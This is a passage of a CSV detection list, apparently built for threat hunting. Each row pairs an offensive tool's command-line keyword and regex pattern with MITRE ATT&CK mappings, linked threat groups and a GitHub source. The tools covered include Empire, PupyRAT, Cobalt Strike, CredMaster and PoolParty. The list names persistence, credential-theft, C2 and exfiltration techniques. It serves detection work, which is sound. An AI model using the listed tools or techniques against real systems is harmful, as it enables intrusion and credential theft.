SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2585"
"* Persist General *.dll*",".{0,1000}\sPersist\sGeneral\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","2586"
"* Persist Tasksch *.dll*",".{0,1000}\sPersist\sTasksch\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","2587"
"* Persist TreatAs *.dll*",".{0,1000}\sPersist\sTreatAs\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","2588"
"* persist_hkcu_run*",".{0,1000}\spersist_hkcu_run.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#registry","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2589"
"* Persistence.sh*",".{0,1000}\sPersistence\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","2590"
"* -PersistenceScriptName *",".{0,1000}\s\-PersistenceScriptName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2591"
"* -PersistentScriptFilePath *",".{0,1000}\s\-PersistentScriptFilePath\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2592"
"* PersistViaScheduledTask.ahk*",".{0,1000}\sPersistViaScheduledTask\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","2593"
"* PetitPotato.cpp*",".{0,1000}\sPetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","2594"
"* PEzor.py *",".{0,1000}\sPEzor\.py\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","2595"
"* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","2596"
"* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","2597"
"* -pfx *.pfx -dc-ip *",".{0,1000}\s\-pfx\s.{0,1000}\.pfx\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2598"
"* pgsql-brute.nse*",".{0,1000}\spgsql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2601"
"* PhishCreds.ps1*",".{0,1000}\sPhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2602"
"* physmem2minidump.py*",".{0,1000}\sphysmem2minidump\.py.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","2603"
"* -pi \\\\\\\\.\\\\pipe\\\\*",".{0,1000}\s\-pi\s\\\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2604"
"* Pictures\Screenshots\loot.zip*",".{0,1000}\sPictures\\Screenshots\\loot\.zip.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot  to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","2605"
"* --pid * --disable --privilege SeDebugPrivilege*",".{0,1000}\s\-\-pid\s.{0,1000}\s\-\-disable\s\-\-privilege\sSeDebugPrivilege.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","2606"
"*----------------------- Pillage Modules -----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sPillage\sModules\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","2607"
"* PingSweep.ps1*",".{0,1000}\sPingSweep\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2608"
"* --pinject *",".{0,1000}\s\-\-pinject\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","2609"
"* -PipeName * -ServiceName * -Command whoami*",".{0,1000}\s\-PipeName\s.{0,1000}\s\-ServiceName\s.{0,1000}\s\-Command\swhoami.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","2610"
"* --pipename *\\pipe\\atctl\*",".{0,1000}\s\-\-pipename\s.{0,1000}\\\\pipe\\\\atctl\\.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","2611"
"* pipename_stager *",".{0,1000}\spipename_stager\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","2612"
"* -pipename_stager *",".{0,1000}\s\-pipename_stager\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","2613"
"* pjl-info-config.nse*",".{0,1000}\spjl\-info\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","2614"
"* pjl-ready-message.nse*",".{0,1000}\spjl\-ready\-message\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2615"
"* --plugin gmailenum*",".{0,1000}\s\-\-plugin\sgmailenum.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2616"
"* --plugin httpbrute --url *",".{0,1000}\s\-\-plugin\shttpbrute\s\-\-url\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2617"
"* --plugin httpbrute*",".{0,1000}\s\-\-plugin\shttpbrute.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2618"
"* --plugin KeeFarceRebornPlugin.dll*",".{0,1000}\s\-\-plugin\sKeeFarceRebornPlugin\.dll.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2619"
"* --plugin KeeFarceRebornPlugin.dll*",".{0,1000}\s\-\-plugin\sKeeFarceRebornPlugin\.dll.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","2620"
"* --plugin o365enum*",".{0,1000}\s\-\-plugin\so365enum.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2621"
"* pngZIP.ps1*",".{0,1000}\spngZIP\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","2622"
"* Podalirius (@podalirius_)*",".{0,1000}Author\s\s\s\s\s\s\s\s\s\s\s\s\s\:\sPodalirius\s\(\@podalirius_\).{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","2623"
"* Poisoners-Session.log*",".{0,1000}\sPoisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","2624"
"* polenum.py*",".{0,1000}\spolenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","2625"
"* PoolParty.cpp*",".{0,1000}\sPoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","2626"
"* PoolParty.exe*",".{0,1000}\sPoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","2627"
"* pop3-brute.nse*",".{0,1000}\spop3\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2628"
"* pop3-capabilities.nse*",".{0,1000}\spop3\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2629"
